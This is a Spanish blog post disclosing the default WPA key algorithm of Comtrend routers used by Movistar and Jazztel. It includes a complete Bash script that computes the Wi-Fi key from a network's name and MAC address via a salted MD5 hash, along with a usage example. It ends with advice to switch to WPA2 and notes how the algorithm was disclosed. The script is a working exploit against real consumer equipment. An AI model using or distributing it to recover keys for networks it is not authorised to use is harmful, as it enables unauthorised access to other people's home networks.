.gif)
Se ha publicado el algoritmo que hace posible conocer las claves por defecto usadas en los routers Comtrend que tienen como patrón el nombre de red wlan_xxxx y jaztel_xxxx.
Sus proveedores son Movistar y Jazztel
La casa Comtrend para obtener la clave WPA usa como patrón la MAC (bssid) del dispositivo i el nombre de la red (essid) combinado con un hash md5sum.
Os dejo el script en Bash que lo hace posible, lo he modificado un poco para que se entender mejor que es lo que hace:
1.- MAC: 64:68:0C:4F:C4:EF
2.- ESSID: wlan_C4EC
[CODIGO]
#!/bin/bash
echo
echo
echo "############### Default KEY's [WPA] wlan_xxxx i jazztel_xxxx #############"
echo
echo
if [ $# -ne 2 ]
then
echo "Usage: $0
echo
echo "Ejamplo: $0 WLAN_C58D 64:68:0C:C5:C5:90"
exit 1
fi
HEAD=$(echo -n "$1" | tr 'a-z' 'A-Z' | cut -d_ -f2)
echo $HEAD " ### El nombre de la red - WLAN_ "
BSSID=$(echo -n "$2" | tr 'a-z' 'A-Z' | tr -d :)
echo $BSSID " ### La MAC del router sin puntos "
BSSIDP=$(echo -n "$BSSID" | cut -c-8)
echo $BSSIDP " ### La MAC del router sin los últimos 4 digitos "
KEY=$(echo -n bcgbghgg$BSSIDP$HEAD$BSSID | md5sum | cut -c-20)
echo
echo " La clave es #####!! $KEY !!#####"
echo
[/CODIGO]
Ya veis que no hace falta ni auditar la red para saber cual es la clave.
Es muy recomendable, si os encontráis con esta tipo de redes en casa, cambiar a WPA2 y combinarlo con una buena clave de seguridad combinado letras (mayúsculas y minúsculas) con números y caracteres especiales.
Este algoritmo fue descubierto por el equipo de cifrados de www.seguridadwireless.net que decidieron no hacerlo público hasta que Comtrend pudiera rectificar.
Posteriormente des de http://www.forocoches.com/foro/ se ha dado con el.
No hay comentarios:
Publicar un comentario